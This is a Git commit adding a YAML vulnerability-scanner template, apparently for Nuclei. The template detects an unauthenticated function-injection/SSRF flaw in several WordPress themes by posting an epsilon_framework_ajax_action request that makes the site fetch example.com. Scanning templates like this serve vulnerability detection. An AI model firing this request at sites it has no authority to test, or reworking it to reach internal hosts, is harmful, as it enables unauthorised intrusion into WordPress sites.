Create multiple-theme-ssrf.yaml

patch-1
SaN ThosH 2021-06-26 13:38:26 +05:30 committed by GitHub
parent afacc21204
commit 59e24ab8a7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: multiple-theme-ssrf
info:
name: Multiple Themes - Unauthenticated Function Injection
author: madrobot
severity: high
tags: wordpress,rce,ssrf
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 158
Connection: close
action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
matchers-condition: and
matchers:
- type: word
words:
- "Example Domain"
- "protocol_version"
part: body
- type: status
status:
- 200